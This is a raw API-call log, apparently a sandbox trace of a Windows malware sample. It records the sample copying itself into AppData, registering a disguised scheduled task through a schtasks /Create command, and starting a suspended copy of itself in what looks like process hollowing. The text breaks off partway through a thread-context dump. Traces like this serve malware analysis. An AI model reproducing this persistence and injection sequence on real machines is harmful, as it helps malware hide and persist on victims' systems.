[0166.277] VirtualProtect (in: lpAddress=0x8c807ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.283] VirtualProtect (in: lpAddress=0x8c807b0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.286] VirtualProtect (in: lpAddress=0x8c807b8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.291] VirtualProtect (in: lpAddress=0x8c807bc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.298] VirtualProtect (in: lpAddress=0x8c807c0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.303] VirtualProtect (in: lpAddress=0x8c807c4, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.305] VirtualProtect (in: lpAddress=0x8c807cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.311] VirtualProtect (in: lpAddress=0x8c807d0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.312] VirtualProtect (in: lpAddress=0x8c807d8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.313] VirtualProtect (in: lpAddress=0x8c807dc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.314] VirtualProtect (in: lpAddress=0x8c807e0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.314] VirtualProtect (in: lpAddress=0x8c807e8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.317] VirtualProtect (in: lpAddress=0x8c807ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.322] VirtualProtect (in: lpAddress=0x8c807f0, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.328] VirtualProtect (in: lpAddress=0x8c807f8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.328] VirtualProtect (in: lpAddress=0x8c807fc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.328] VirtualProtect (in: lpAddress=0x8c80800, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.329] VirtualProtect (in: lpAddress=0x8c80808, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.329] VirtualProtect (in: lpAddress=0x8c8080c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.329] VirtualProtect (in: lpAddress=0x8c80810, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.330] VirtualProtect (in: lpAddress=0x8c80814, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.333] VirtualProtect (in: lpAddress=0x8c8081c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.334] VirtualProtect (in: lpAddress=0x8c80820, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.334] VirtualProtect (in: lpAddress=0x8c80824, dwSize=0x8, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.338] VirtualProtect (in: lpAddress=0x8c8082c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0166.338] VirtualProtect (in: lpAddress=0x8c80830, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x19cd3c | out: lpflOldProtect=0x19cd3c*=0x1) returned 0
[0167.125] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0167.125] GetLastError () returned 0x57
[0167.130] OpenMutexW (dwDesiredAccess=0x100001, bInheritHandle=0, lpName="ELAIITwngSefilReBsBJLauTa") returned 0x0
[0167.130] GetLastError () returned 0x2
[0167.139] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="ELAIITwngSefilReBsBJLauTa") returned 0x380
[0167.140] GetLastError () returned 0x0
[0172.212] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x7a8160 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0
[0172.213] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x19cde4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming", lpFilePart=0x0) returned 0x25
[0172.213] GetLastError () returned 0x3f0
[0172.218] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", nBufferLength=0x105, lpBuffer=0x19ce4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", lpFilePart=0x0) returned 0x36
[0172.218] GetLastError () returned 0x3f0
[0172.218] SetErrorMode (uMode=0x1) returned 0x0
[0172.218] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\xeraccejcqld.exe"), fInfoLevelId=0x0, lpFileInformation=0x19d2cc | out: lpFileInformation=0x19d2cc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
[0172.218] GetLastError () returned 0x2
[0172.218] SetErrorMode (uMode=0x0) returned 0x1
[0172.225] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19cd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0172.225] GetLastError () returned 0x2
[0172.225] SetErrorMode (uMode=0x1) returned 0x0
[0172.225] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354
[0172.225] GetLastError () returned 0x0
[0172.226] GetFileType (hFile=0x354) returned 0x1
[0172.226] SetErrorMode (uMode=0x0) returned 0x1
[0172.226] GetFileType (hFile=0x354) returned 0x1
[0172.226] GetFileSize (in: hFile=0x354, lpFileSizeHigh=0x19d2e0 | out: lpFileSizeHigh=0x19d2e0*=0x0) returned 0x182a00
[0172.226] GetLastError () returned 0x0
[0172.231] ReadFile (in: hFile=0x354, lpBuffer=0x3af5cc0, nNumberOfBytesToRead=0x182a00, lpNumberOfBytesRead=0x19d288, lpOverlapped=0x0 | out: lpBuffer=0x3af5cc0*, lpNumberOfBytesRead=0x19d288*=0x182a00, lpOverlapped=0x0) returned 1
[0172.267] GetLastError () returned 0x0
[0172.269] CloseHandle (hObject=0x354) returned 1
[0172.269] GetLastError () returned 0x0
[0172.273] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", nBufferLength=0x105, lpBuffer=0x19cd34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe", lpFilePart=0x0) returned 0x36
[0172.273] GetLastError () returned 0x0
[0172.273] SetErrorMode (uMode=0x1) returned 0x0
[0172.274] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\xErAccEJcQLD.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\xeraccejcqld.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x354
[0172.274] GetLastError () returned 0x0
[0172.275] GetFileType (hFile=0x354) returned 0x1
[0172.275] SetErrorMode (uMode=0x0) returned 0x1
[0172.275] GetFileType (hFile=0x354) returned 0x1
[0172.275] WriteFile (in: hFile=0x354, lpBuffer=0x3af5cc0*, nNumberOfBytesToWrite=0x182a00, lpNumberOfBytesWritten=0x19d294, lpOverlapped=0x0 | out: lpBuffer=0x3af5cc0*, lpNumberOfBytesWritten=0x19d294*=0x182a00, lpOverlapped=0x0) returned 1
[0172.307] GetLastError () returned 0x0
[0172.308] CloseHandle (hObject=0x354) returned 1
[0172.357] GetLastError () returned 0x0
[0172.445] GetCurrentProcess () returned 0xffffffff
[0172.445] GetLastError () returned 0x3f0
[0172.445] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19d200 | out: TokenHandle=0x19d200*=0x354) returned 1
[0172.445] GetLastError () returned 0x3f0
[0172.455] GetCurrentProcess () returned 0xffffffff
[0172.455] GetLastError () returned 0x3f0
[0172.455] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19d1b0 | out: TokenHandle=0x19d1b0*=0x384) returned 1
[0172.455] GetLastError () returned 0x3f0
[0172.458] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19d258 | out: TokenInformation=0x0, ReturnLength=0x19d258) returned 0
[0172.458] GetLastError () returned 0x7a
[0172.460] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x77d770
[0172.460] GetLastError () returned 0x7a
[0172.460] GetTokenInformation (in: TokenHandle=0x354, TokenInformationClass=0x1, TokenInformation=0x77d770, TokenInformationLength=0x24, ReturnLength=0x19d258 | out: TokenInformation=0x77d770, ReturnLength=0x19d258) returned 1
[0172.460] GetLastError () returned 0x7a
[0172.465] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x19d124, DesiredAccess=0x800, PolicyHandle=0x19d0cc | out: PolicyHandle=0x19d0cc) returned 0x0
[0172.466] GetLastError () returned 0x0
[0172.467] LsaLookupSids (in: PolicyHandle=0x77e258, Count=0x1, Sids=0x27990ac*=0x279904c*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), ReferencedDomains=0x19d0f4, Names=0x19d0e8 | out: ReferencedDomains=0x19d0f4, Names=0x19d0e8) returned 0x0
[0172.492] GetLastError () returned 0x0
[0172.493] LsaClose (ObjectHandle=0x77e258) returned 0x0
[0172.493] GetLastError () returned 0x0
[0172.494] LsaFreeMemory (Buffer=0x7860e0) returned 0x0
[0172.494] GetLastError () returned 0x0
[0172.494] LsaFreeMemory (Buffer=0x784f08) returned 0x0
[0172.494] GetLastError () returned 0x0
[0172.497] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x7a8160 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25
[0172.498] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19cdb8, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16
[0172.499] GetLastError () returned 0x0
[0172.499] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29
[0172.499] GetLastError () returned 0x0
[0172.499] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x19cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29
[0172.499] GetLastError () returned 0x0
[0172.500] GetTempFileNameW (in: lpPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x7a8160 | out: lpTempFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp")) returned 0x2010
[0172.501] GetLastError () returned 0x0
[0172.512] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x40) returned 0x7bd190
[0172.513] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", nBufferLength=0x105, lpBuffer=0x19cc5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", lpFilePart=0x0) returned 0x34
[0172.513] GetLastError () returned 0x0
[0172.513] SetErrorMode (uMode=0x1) returned 0x0
[0172.513] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x368
[0172.513] GetLastError () returned 0xb7
[0172.514] GetFileType (hFile=0x368) returned 0x1
[0172.514] SetErrorMode (uMode=0x0) returned 0x1
[0172.514] GetFileType (hFile=0x368) returned 0x1
[0172.515] WriteFile (in: hFile=0x368, lpBuffer=0x279ce3c*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x19d1b4, lpOverlapped=0x0 | out: lpBuffer=0x279ce3c*, lpNumberOfBytesWritten=0x19d1b4*=0x66e, lpOverlapped=0x0) returned 1
[0172.516] GetLastError () returned 0xb7
[0172.516] CloseHandle (hObject=0x368) returned 1
[0172.522] GetLastError () returned 0xb7
[0172.573] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x7bc590
[0172.574] RtlMoveMemory (in: Destination=0x7bc590, Source=0x279de4c, Length=0x1a | out: Destination=0x7bc590)
[0172.574] LocalAlloc (uFlags=0x0, uBytes=0xbe) returned 0x799b70
[0172.574] RtlMoveMemory (in: Destination=0x799b70, Source=0x279df34, Length=0xbe | out: Destination=0x799b70)
[0172.580] ShellExecuteExW (in: pExecInfo=0x279e204*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\xErAccEJcQLD\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x279e204*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\xErAccEJcQLD\" /XML \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x4d0)) returned 1
[0175.750] GetLastError () returned 0x0
[0175.751] LocalFree (hMem=0x7bc590) returned 0x0
[0175.751] GetLastError () returned 0x0
[0175.751] LocalFree (hMem=0x799b70) returned 0x0
[0175.751] GetLastError () returned 0x0
[0175.756] GetCurrentProcess () returned 0xffffffff
[0175.756] GetLastError () returned 0x0
[0175.756] GetCurrentProcess () returned 0xffffffff
[0175.756] GetLastError () returned 0x0
[0175.757] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x19d1f4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x19d1f4*=0x458) returned 1
[0175.757] GetLastError () returned 0x0
[0175.758] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x7fffffff, cHandles=0x1, pHandles=0x19d21c*=0x458, lpdwindex=0x19cfd4 | out: lpdwindex=0x19cfd4) returned 0x0
[0195.762] CloseHandle (hObject=0x458) returned 1
[0195.762] GetLastError () returned 0x0
[0195.775] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", nBufferLength=0x105, lpBuffer=0x19cde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp", lpFilePart=0x0) returned 0x34
[0195.775] GetLastError () returned 0x0
[0195.781] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmp2010.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmp2010.tmp")) returned 1
[0195.784] GetLastError () returned 0x0
[0195.814] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", nBufferLength=0x105, lpBuffer=0x19cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpFilePart=0x0) returned 0x62
[0195.814] GetLastError () returned 0x0
[0195.927] CreateProcessW (in: lpApplicationName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe", lpCommandLine="\"{path}\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x73daf8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19d260 | out: lpCommandLine="\"{path}\"", lpProcessInformation=0x19d260*(hProcess=0x454, hThread=0x458, dwProcessId=0x9a8, dwThreadId=0xce0)) returned 1
[0195.979] GetThreadContext (in: hThread=0x458, lpContext=0x279e9b8 | out: lpContext=0x279e9b8*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x386000, Edx=0x0, Ecx=0x0, Eax=0x583f8e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, 
[62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, 
[247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, 